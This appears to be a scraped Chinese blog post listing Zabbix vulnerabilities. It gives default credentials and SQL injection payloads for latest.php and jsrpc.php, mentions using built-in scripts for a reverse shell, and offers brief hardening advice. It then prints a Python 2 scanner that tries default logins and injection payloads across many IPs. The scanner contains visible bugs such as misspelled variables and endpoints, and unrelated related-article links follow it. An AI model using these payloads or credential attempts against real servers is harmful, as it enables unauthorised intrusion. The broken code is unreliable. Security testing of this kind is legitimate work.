Zabbix漏洞汇总
一、zabbix:
zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
二、Zabbix漏洞:
1、弱口令:
WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
2、SQL注入
(1)
标题:latest.php处toogle_ids[]参数SQL注入
攻击条件:登陆后
危害:可获取系统权限
URL以及payload:
"""
http://a.b.c.d/latest.php?output=ajax&sid=登录后的sessionid的后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""
(2)
标题:jsrpc.php处profileIdx2参数SQL注入
攻击条件:无需登录,亦可以登录后使用高权限的sid、cookie进行替换
危害:一般SQL注入危害
URL以及payload:
"""
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""
(3)
标题:其他SQL注入漏洞:chart_bar.php处itemid参数和periods参数SQL注入;httpmon.php处applications参数SQL注入
攻击条件:不详
危害:不详
URL以及payload:一般SQL注入payload尝试
3、OS命令注入执行:
(1)弱口令登录后,使用zabbix自带的Script执行系统命令可以反弹shell等等
(2)防御:
#不要设置AllowRoot=1,避免agent和server以root权限启动。
#进制agent执行system.run,不要设置EnableRemoteCommands=1。
#即使打补丁。
4、自己写的一个python检查脚本:有问题及时喷我
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
""" # import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser #global varites define
ZabbixTarget = None#target ip address!
ZabbixFile = None#target ip address file
BlackList = [
'incorrect',
'<!-- Login Form -->'
] #global config set
logging.basicConfig(level=logging.INFO,format='%(message)s') #global function defines:
def Config_Init():
"""
Take "http://" to the ip address to create targeturl!
"""
global ZabbixTarget
global ZabbixFile
if ZabbixTarget != None:
target = "http://%s"%ZabbixTarget
return [target]
elif ZabbixFile != None:
targetlist = []
with open(ZabbixFile,"r") as fr:
for ip in fr.readlines():
ip = ip.split("\n")[0].split("\r")[0]
target = "http://%s"%str(ip)
targetlist.append(target)
return targetlist
else:
return [] def get_post_data(page_content):
"""
from response html get post data!
"""
postdata = {}
soup = BeautifulSoup(page_content, "html.parser")
for inputparameter in soup.find_all('input'):
if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
postdata[inputparameter['name']] = inputparameter['value']
return postdata def report_file_allinone():
vulnlist = []
scantime = str(datetime.datetime.now())
for parents,dirs,filenames in os.walk("./"):
for filename in filenames:
if filename.find("zabbix_vulnscan_result") >= 0:
with open(filename,"r") as fr:
vulnlist.extend(fr.readlines())
os.remove(filename)
with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw:
fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
for line in vulnlist:
fw.write(line) #Zabbix Scan Class Defines
class ZabbixScan:
def __init__(self,targetlist):
"""
#class column init!
VulnExpPHPFile:
//0-login-weakpassword
//1-httpmon.php parameter->applicationos
//2-chart_bar.php parameter->itemid
//3-jsrpc.php parameter->profileIdx2
//4-latest.php parameter->toggle_ids[]
//5-OS_Injection->When you login the system you can run you scripts!
TestTarget:
//0-login-weakpassword
//1-jsrpc.php
//2-latest.php
"""
self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary!
self._targetlist = targetlist #wait for scan target!
self._size = len(self._targetlist)#size of scan target!
self._sqlinjectionurl1_vulnlist = []
self._sqlinjectionurl2_vulnlist = []
self._login_weakpassword_vulnlist = []
self._login_weakpassword_safelist = [] def __del__(self):
del self._weakpassword
del self._targetlist
del self._size
del self._sqlinjectionurl1_vulnlist
del self._sqlinjectionurl2_vulnlist
del self._login_weakpassword_vulnlist
del self._login_weakpassword_safelist def __len__(self):
"""return size of targetlist"""
return self._size def _scan_default_password_login(self):
for authinfo in self._weakpassword:
user = authinfo["username"]
pswd = authinfo["password"]
for target in self._targetlist:
logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo)))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
request = requests.session()
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if response.status_code != 200:
self._login_weakpassword_safelist.append(target)
continue
postdata = get_post_data(response.content)
headers["Referer"]=target
postdata["user"] = user
postdata["password"] = pswd
try:
response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if "chkbxRange.init();" in response.content:
for flagstring in BlackList:
if flagstring in response.content:
self._login_weakpassword_safelist.append(target)
self._login_weakpassword_vulnlist.append((target,user,pswd))
else:
self._login_weakpassword_safelist.append(target)
request.close() def _sqlinjectionurl1_scan(self):
logging.info("[*] latest.php sqlinjection scan!")
for vulntarget in self._login_weakpassword_vulnlist:
target = vulntarget[0]
user = vulntarget[1]
pswd = vulntarget[2]
request = requests.session()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
continue
postdata = get_post_data(response.content)
postdata["user"] = user
postdata["password"] = pswd
headers["Referer"]=target
try:
response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
continue
sessionid = response.cookie.values()[0][-16:]
scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid)
try:
response = request.get(scanurl,timeout=20)
except Exception,ex:
continue
if "SQL syntax" in repsonse:
self._sqlinjectionurl1_vulnlist.append(vulntarget)
else:
request.close() def _sqlinjectionurl2_scan(self):
logging.info("[*] jsrpc.php sqlinjection scan!")
for vulntarget in self._targetlist:
scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(url,headers=headers,timeout=20)
except Exception,ex:
continue
if "ed733b8d10be255eceba344d533586" in response.content:
self._sqlinjectionurl2_vulnlist.append(vulntarget)
else:
pass def scan_run(self):
self._scan_default_password_login()
self._sqlinjectionurl1_scan()
self._sqlinjectionurl2_scan() class scanthread(threading.Thread):
def __init__(self,threadname,targetlist):
threading.Thread.__init__(self,name=threadname)
self.scanner = ZabbixScan(targetlist)
self.name = threadname
self.targetlist = targetlist
def _create_csv(self):
scantime = str(datetime.datetime.now())
with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw:
for vuln in self.scanner._login_weakpassword_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "weakpassword"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "latest.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = target.split("http://")[-1]
vulntype = "jsrpc.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
def run(self):
#logging.info("[*] %s running!"%self.name)
#logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist)))
self.scanner.scan_run()
self._create_csv()
#logging.info("[*] %s finished!"%self.name) if __name__ == "__main__":
logging.info("[+]*****************************************************************[+]")
logging.info("Zabbix Scan Init!")
parser = OptionParser()
parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!")
parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!")
parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!")
(options, args) = parser.parse_args()
parameterchecklist = [options.iptarget,options.iptargetfile]
if parameterchecklist in [[None,None],[None,""],["",None],["",""]]:
logging.error("[-] Target parameters error!")
exit(0)
try:
options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum)
except Exception,ex:
logging.error("[-] Threadnum parameter error!")
exit(0)
[ZabbixTarget,ZabbixFile] = parameterchecklist
logging.info("[+] Scan Config Init!")
targetlist = Config_Init()
targetsize = len(targetlist)
logging.info("[+] Scan Target Number:%s"%str(targetsize))
logging.info("[+] Scan Threads Init")
threadtargetsize = targetsize/options.threadnum
devidestart = 0
devideend = threadtargetsize
threadlist = []
nameflag = 0
while True:
threadname = "scan-thread-%s"%str(nameflag)
nameflag += 1
if devideend < targetsize:
threadtargetlist = targetlist[devidestart:devideend]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
elif devidestart <= targetsize:
threadtargetlist = targetlist[devidestart:]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
else:
break logging.info("[+] Scan Thread Start!")
for thread in threadlist:
thread.start()
time.sleep(2)
logging.info("[+] %s --Start!"%thread.name)
for thread in threadlist:
thread.join()
logging.info("[+] Scan Finished!")
logging.info("[+] Report Creating!")
report_file_allinone()
logging.info("[+] Report Create!")
exit(0)
Zabbix漏洞汇总的更多相关文章
- Zabbix 漏洞分析
之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析. PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点. 0x00 Zabbix简介 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
- zabbix漏洞
1:Zabbix配置不当安全事件 ①案例事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0 ...
- Zabbix漏洞学习
Zabbix介绍 zabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. zabbix能监视各种网络参数,保证服务器系统的安全运营:并提供灵 ...
- Zabbix漏洞利用 CVE-2016-10134
最近也是遇见了Zabbix,所以这里以CVE-2016-10134为例复现一下该漏洞 什么是Zabbix? zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. ...
- zabbix 问题汇总
1.Zabbix agent on Zabbix server is unreachable for 5 minutes 查看日志sudo tailf /var/log/zabbix/zabbix_a ...
- 常见Java库漏洞汇总
1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件 ...
- struts2远程代码执行漏洞汇总整理
一.S2-001 1.漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果. 举个例子,当你提交的登录表单为username=xishir& ...
- android CVE 漏洞汇总
arm exploits 技术教程: Learning Pentesting for Android Devices CVE-2015-1530 ,CVE-2015-1474 两个android整数溢 ...
随机推荐
- 上手并过渡到PHP7(2)——必须传递int, string, bool参数?没问题
Type hints, Type safe 泊学实操视频 泊学原文链接PHP 7中最引人注目的新特性之一,无疑是Scalar type hints.我们可以在函数参数和返回值中使用scalar typ ...
- 几种常见的DIV边框样式
<html> <head> <title>边框样式</title> </head> <body> <p style=bor ...
- 【转】WCF入门教程一[什么是WCF]
一.概述 Windows Communication Foundation(WCF)是由微软发展的一组数据通信的应用程序开发接口,可以翻译为Windows通讯接口,它是.NET框架的一部分.由 .NE ...
- 第二百八十八节,MySQL数据库-索引、limit分页、执行计划、慢日志查询
MySQL数据库-索引.limit分页.执行计划.慢日志查询 索引,是数据库中专门用于帮助用户快速查询数据的一种数据结构.类似于字典中的目录,查找字典内容时可以根据目录查找到数据的存放位置,然后直接获 ...
- C#中的程序集和命名空间
C#中的程序集和命名空间 如果说命名空间是类库的逻辑组织形式,那么程序集就是类库的物理组织形式.只有同时指定类型所在的命名空间及实现该类型的程序集,才能完全限定该类型.<精通.NET核心技术-- ...
- Ubuntu13.04下Eclipse中文乱码解决
参考:http://www.linuxidc.com/Linux/2011-12/50056.htm baoyu@baoyu:~$ gedit /var/lib/locales/supported.d ...
- 第一个OC程序
第一个OC程序源码如下: #import <Foundation/Foundation.h> int main(int argc, const char * argv[]) { @auto ...
- ASP.NET中相对路径的使用总结
如果有一个网站上的图片的路径是这样的: http://localhost:2008/websit1/images/1.jpg websit1表示的是虚拟路径或者是站点 在asp.net中,如果我们在. ...
- Supervisor安装与配置(非守护进程管理工具)
http://blog.csdn.net/xyang81/article/details/51555473
- usb摄像头的检测
下面写一下过程: 如果你能在http://www.ideasonboard.org/uvc/找到你的摄像头的ID,即UVC支持的,那么就可以在linux下使用了.至于从哪个版本开始内核支持UVC,官方 ...